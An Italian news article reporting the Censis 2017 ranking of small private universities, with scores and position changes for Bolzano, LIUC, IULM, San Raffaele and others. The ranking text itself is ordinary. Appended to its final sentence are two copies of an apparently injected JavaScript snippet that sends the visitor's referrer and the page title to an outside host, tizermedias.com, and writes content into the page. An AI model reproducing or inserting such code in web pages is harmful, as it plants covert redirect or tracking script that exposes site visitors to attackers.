Classifica Censis 2017 degli atenei privati piccoli

La classifica Censis 2017 degli atenei privati piccoli assegna il primato nella categoria delle istituzioni non statali con un numero di iscritti fino a 5mila alla Libera Università di Bolzano. Il punteggio medio con il quale l’ateneo si merita la vetta è un ragguardevole 108,8 su 110, il più alto in assoluto tra quelli degli atenei privati. Bolzano incrementa il punteggio rispetto all’anno passato di ben 6,6 punti e si merita il punteggio pieno (110 su 110) per tre indicatori su cinque: comunicazione, servizi e strutture. Anche nelle altre voci considerate dal Censis Bolzano ottiene risultati brillanti, riportando ottimi punteggi anche per le  borse (106) e l’internazionalizzazione (108).

Al secondo posto della classifica Censis 2017 degli atenei privati piccoli si conferma la LIUC, che ottiene una media di 93,4, in calo di 2,6 punti rispetto all’anno passato. L’Università della Valle d’Aosta è ancora una volta terza, avendo ottenuto una media di 86,6 punti (+1,4 rispetto alla precedente edizione). Non ci sono cambiamenti neppure per quanto riguarda il quarto posto, che spetta nuovamente allo IULM. Per l’ateneo milanese il punteggio medio questa volta è pari a 86,2 (+3,8).

Mantiene il quinto posto conquistato per la prima volta l’anno passato il Campus Bio-Medico di Roma, che nella classifica Censis 2017 degli atenei privati piccoli totalizza una media di 83,2. Al sesto posto risale l’Università San Raffaele (79,6), che l’anno scorso era stata ricacciata un gradino più indietro dalla UNINT (ex LUSPIO), stavolta settima. L’università romana, nonostante abbia migliorato il proprio punteggio, passando da 78,2 a 79,4, viene scavalcata per appena 0,2 punti.

Chiudono la classifica Censis 2017 degli atenei privati piccoli l’Università Europea di Roma, che guadagna 1,8 punti attestandosi a quota 77, ma rimane penultima, e la LUM di Casamassima (BA), di nuovo ultima. Anche l’università pugliese ha incrementato la propria media, passando da 71,4 a 72,8 punti, ma il fatto che si fermi al punteggio minimo in tre indicatori su cinque e che negli altri vada oltre quota 80 punti solo in un caso pesa sulla sua performance.(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();